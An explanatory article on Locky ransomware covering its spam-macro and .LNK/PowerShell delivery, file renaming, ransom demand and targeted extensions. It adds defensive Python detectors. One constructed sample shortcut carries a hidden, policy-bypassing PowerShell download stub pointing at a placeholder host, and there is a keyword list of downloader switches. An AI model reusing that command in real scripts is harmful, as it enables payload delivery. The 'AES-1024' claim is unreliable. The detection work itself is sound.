Since February, Locky has been changing its extensions in a bid to deceive victims into thinking they have been infected by a different ransomware. Locky originally renamed encrypted files to .locky, and by the time summer arrived it had evolved to the .zepto extension, which has been used in multiple campaigns since.
Locky ransomware mainly spreads via spam email campaigns run by the attackers. These spam emails mostly carry .doc attachments that contain scrambled text and embedded macros.
A typical email used in Locky distribution poses as an invoice, which catches most users' attention.
Once the user enables macros in Word, an executable file, which is actually the ransomware, is downloaded to the PC. The ransomware then encrypts various files on the victim's PC, giving them unique 16-character letter-and-digit names with the .shit, .thor, .locky, .zepto or .odin extension. All files are encrypted using the RSA-2048 and AES-1024 algorithms and require a private key, stored on remote servers controlled by the cyber criminals, for decryption.
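The renaming scheme described above is something a responder can check for directly. The following is an added example, not code from the original write-up: it matches file names against the 16-character stem plus Locky extension pattern and reports, per directory, how much of the content has already been renamed. The sample paths are constructed, and the assumption that the stem is exactly 16 ASCII letters or digits (matched case-insensitively) is the example's own reading of the description.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Extensions the write-up says Locky appends, and the 16-character stem it gives renamed files.
LOCKY_EXTENSIONS = ("locky", "zepto", "odin", "shit", "thor")
# Assumption: "16 letter-digit combination" means exactly 16 ASCII letters/digits; matched
# case-insensitively because the page's own extension list mixes cases (.nef and .NEF).
LOCKY_NAME = re.compile(r"^[0-9A-Za-z]{16}\.(?:%s)$" % "|".join(LOCKY_EXTENSIONS), re.IGNORECASE)


def is_locky_name(path: str) -> bool:
    """True when the file's base name matches Locky's renamed-file pattern."""
    return LOCKY_NAME.match(PureWindowsPath(path).name) is not None


def directory_report(paths, threshold: float = 0.5) -> dict:
    """Per directory: total files, renamed files, and an alert when the renamed share >= threshold."""
    totals, renamed = defaultdict(int), defaultdict(int)
    for p in paths:
        parent = str(PureWindowsPath(p).parent)
        totals[parent] += 1
        renamed[parent] += is_locky_name(p)
    return {d: {"files": totals[d], "renamed": renamed[d],
                "alert": renamed[d] / totals[d] >= threshold} for d in totals}


# Constructed sample listing: one user profile mid-infection, one untouched.
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\A1B2C3D4E5F60718.locky",
    r"C:\Users\alice\Documents\0F1E2D3C4B5A6978.zepto",
    r"C:\Users\alice\Documents\ransom_note.txt",       # constructed stand-in for the dropped text file
    r"C:\Users\alice\Pictures\9A8B7C6D5E4F3A2B.ODIN",
    r"C:\Users\alice\Pictures\holiday.jpg",
    r"C:\Users\bob\Documents\budget.xlsx",
    r"C:\Users\bob\Documents\notes.docx",
    r"C:\Users\bob\Documents\short.locky",             # wrong stem length: not Locky's scheme
]
```

Run it over a real listing (for example the output of a file-system walk) to find which shares or profiles to isolate first.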
The ransom note further states that files can only be decrypted using a decrypter developed by the cyber criminals, costing 0.5 Bitcoin. To get the files back, the victim is asked to install the Tor browser and follow a link provided in the text files/wallpaper; the website contains instructions for making the payment.
There is no guarantee that the victim's files will be decrypted even after the payment is made, but ransomware authors usually stick to their part of the bargain to protect their 'reputation'.
Since its evolution in February this year, Locky infections have gradually decreased, along with fewer detections of Nemucod, which Locky uses to infect computers (Nemucod is a .wsf file delivered in .zip attachments in spam email). However, as Microsoft reports, Locky's authors have changed the attachment from .wsf files to shortcut files (.LNK extension) that contain PowerShell commands to download and run Locky.
An example of the spam email shows that it is designed to attract immediate attention from users: it is sent with high importance and with random characters in the subject line, and the body of the email is empty.
The spam email, typically named "Bill", arrives with a .zip attachment containing the .LNK files. By opening the .zip attachment, users trigger the infection chain. This threat is detected as TrojanDownloader:PowerShell/Ploprolo.A. When the PowerShell script runs successfully, it downloads and executes Locky in a temporary folder, completing the infection chain.
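To show what a mail gateway or analyst has to look at to catch the .LNK variant described above, here is an added example (not code from the original write-up or from Microsoft): a minimal parser for the Shell Link StringData section that pulls out a shortcut's target path and arguments, and a check that flags shortcuts launching PowerShell with download-style switches. The sample .LNK bytes, the lure text and the keyword list are constructed for this example.

```python
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that say which variable-length parts follow the 76-byte header.
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))  # StringData order in the file
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# Tokens a shortcut that launches a PowerShell downloader would carry; tune the list per environment.
SUSPICIOUS_TOKENS = ("powershell", "downloadfile", "downloadstring", "-enc", "bypass", "hidden")


def lnk_strings(data: bytes) -> dict:
    """Parse a Shell Link (.LNK) and return its StringData fields (target path, arguments, ...)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:    # LinkTargetIDList: u16 size followed by that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfo: u32 size that counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    enc, width = ("utf-16-le", 2) if flags & IS_UNICODE else ("cp1252", 1)
    fields = {}
    for flag, name in STRING_FIELDS:  # each present field: u16 character count, then the chars
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            fields[name] = data[pos + 2:pos + 2 + width * count].decode(enc)
            pos += 2 + width * count
    return fields


def is_suspicious_lnk(data: bytes) -> bool:
    """True when the shortcut's target or arguments look like a PowerShell downloader."""
    fields = lnk_strings(data)
    text = " ".join(fields.get(k, "") for k in ("relative_path", "arguments")).lower()
    return any(tok in text for tok in SUSPICIOUS_TOKENS)


def build_lnk(relative_path: str, arguments: str = "") -> bytes:
    """Build a minimal constructed .LNK (Unicode strings, no IDList/LinkInfo) to exercise the parser."""
    flags = 0x08 | IS_UNICODE | (0x20 if arguments else 0)
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(0x4C - 24)  # zero the rest
    strings = [relative_path] + ([arguments] if arguments else [])
    return header + b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)


# Constructed samples: a benign document shortcut and a "Bill" lure that launches PowerShell.
BENIGN_LNK = build_lnk(r"..\..\Documents\report.docx")
LURE_LNK = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     '-w hidden -ep bypass -c "<constructed stub: DownloadFile http://example.invalid/bill.exe>"')
```

In practice, feed `is_suspicious_lnk` the bytes of every .lnk member found in a .zip attachment; a shortcut inside an e-mailed archive that resolves to powershell.exe is reason enough to quarantine the message.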
File extensions targeted by Locky for encryption: .yuv, .ycbcra, .xis, .wpd, .tex, .sxg, .stx, .srw, .srf, .sqlitedb, .sqlite3, .sqlite, .sdf, .sda, .s3db, .rwz, .rwl, .rdb, .rat, .raf, .qby, .qbx, .qbw, .qbr, .qba, .psafe3, .plc, .plus_muhd, .pdd, .oth, .orf, .odm, .odf, .nyf, .nxl, .nwb, .nrw, .nop, .nef, .ndd, .myd, .mrw, .moneywell, .mny, .mmw, .mfw, .mef, .mdc, .lua, .kpdx, .kdc, .kdbx, .jpe, .incpas, .iiq, .ibz, .ibank, .hbk, .gry, .grey, .gray, .fhd, .ffd, .exf, .erf, .erbsql, .eml, .dxg, .drf, .dng, .dgc, .des, .der, .ddrw, .ddoc, .dcs, .db_journal, .csl, .csh, .crw, .craw, .cib, .cdrw, .cdr6, .cdr5, .cdr4, .cdr3, .bpw, .bgt, .bdb, .bay, .bank, .backupdb, .backup, .back, .awg, .apj, .ait, .agdl, .ads, .adb, .acr, .ach, .accdt, .accdr, .accde, .vmxf, .vmsd, .vhdx, .vhd, .vbox, .stm, .rvt, .qcow, .qed, .pif, .pdb, .pab, .ost, .ogg, .nvram, .ndf, .m2ts, .log, .hpp, .hdd, .groups, .flvv, .edb, .dit, .dat, .cmt, .bin, .aiff, .xlk, .wad, .tlg, .say, .sas7bdat, .qbm, .qbb, .ptx, .pfx, .pef, .pat, .oil, .odc, .nsh, .nsg, .nsf, .nsd, .mos, .indd, .iif, .fpx, .fff, .fdb, .dtd, .design, .ddd, .dcr, .dac, .cdx, .cdf, .blend, .bkp, .adp, .act, .xlr, .xlam, .xla, .wps, .tga, .pspimage, .pct, .pcd, .fxg, .flac, .eps, .dxb, .drw, .dot, .cpi, .cls, .cdr, .arw, .aac, .thm, .srt, .save, .safe, .pwm, .pages, .obj, .mlb, .mbx, .lit, .laccdb, .kwm, .idx, .html, .flf, .dxf, .dwg, .dds, .csv, .css, .config, .cfg, .cer, .asx, .aspx, .aoi, .accdb, .7zip, .xls, .wab, .rtf, .prf, .ppt, .oab, .msg, .mapimail, .jnt, .doc, .dbx, .contact, .mid, .wma, .flv, .mkv, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .qcow2, .vdi, .vmdk, .vmx, .wallet, .upk, .sav, .ltx, .litesql, .litemod, .lbf, .iwi, .forge, .das, .d3dbsp, .bsa, .bik, .asset, .apk, .gpg, .aes, .ARC, .PAQ, .tar.bz2, .tbk, .bak, .tar, .tgz, .rar, .zip, .djv, .djvu, .svg, .bmp, .png, .gif, .raw, .cgm, .jpeg, .jpg, .tif, .tiff, .NEF, .psd, .cmd, .bat, .class, .jar, .java, .asp, .brd, .sch, .dch, .dip, .vbs, .asm, .pas, .cpp, .php, .ldf, .mdf, .ibd, .MYI, .MYD, .frm, .odb, .dbf, .mdb, .sql, .SQLITEDB, .SQLITE3, .pst, .onetoc2, .asc, .lay6, .lay, .ms11 (Security copy), .sldm, .sldx, .ppsm, .ppsx, .ppam, .docb, .mml, .sxm, .otg, .odg, .uop, .potx, .potm, .pptx, .pptm, .std, .sxd, .pot, .pps, .sti, .sxi, .otp, .odp, .wks, .xltx, .xltm, .xlsx, .xlsm, .xlsb, .slk, .xlw, .xlt, .xlm, .xlc, .dif, .stc, .sxc, .ots, .ods, .hwp, .dotm, .dotx, .docm, .docx, .DOT, .max, .xml, .txt, .CSV, .uot, .RTF, .pdf, .XLS, .PPT, .stw, .sxw, .ott, .odt, .DOC, .pem, .csr, .crt, .ke.
Locky is a dangerous virus that poses a grave threat to your PC. It is recommended that you follow these instructions to prevent ransomware and avoid getting infected.
As of now, there is no decrypter available for Locky ransomware. However, a decryptor from Emsisoft can be used to decrypt files encrypted by AutoLocky, another ransomware that also renames files with the .locky extension. AutoLocky is written in the AutoIt scripting language and tries to mimic the more complex and sophisticated Locky. You can see the complete list of available ransomware decryptor tools here.